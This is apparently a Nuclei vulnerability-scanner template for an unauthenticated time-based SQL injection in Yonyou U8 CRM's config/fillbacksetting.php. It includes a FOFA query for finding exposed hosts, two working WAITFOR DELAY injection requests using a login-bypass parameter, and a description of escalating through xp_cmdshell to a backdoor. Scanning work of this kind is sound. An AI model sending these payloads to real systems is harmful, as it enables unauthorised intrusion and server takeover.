id: yongyouU8-CRM-fillbacksetting_php-sql

info:
  name: 用友U8 CRM config/fillbacksetting.php SQL延时注入漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: body="用友U8CRM"
    用友 U8 CRM客户关系管理系统 config/fillbacksetting.php 文件存在SQL注入漏洞，未经身份验证的攻击者通过漏洞执行任意SQL语句，调用xpcmdshell写入后门文件，执行任意代码，从而获取到服务器权限。
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247487867&idx=1&sn=f673ef7f776af4d39b6385d27f684db0&chksm=c267a448f5102d5ecdd73438a8497782f43048b682f9f707a9bb6feb4634d2eb524b43d749de&token=129725642&lang=zh_CN#rd
  tags: sql injection


http:
  - raw:
      - |
        GET /config/fillbacksetting.php?DontCheckLogin=1&action=delete&id=-99;WAITFOR+DELAY+'0:0:4'-- HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
        Cookie: PHPSESSID=bgsesstimeout-;

      - |
        GET /config/fillbacksetting.php?DontCheckLogin=1&action=delete&id=-99;WAITFOR+DELAY+'0:0:8'-- HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
        Cookie: PHPSESSID=bgsesstimeout-;

    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<=5'  
          - 'duration_2>=8 && duration_2<=9'
        condition: and



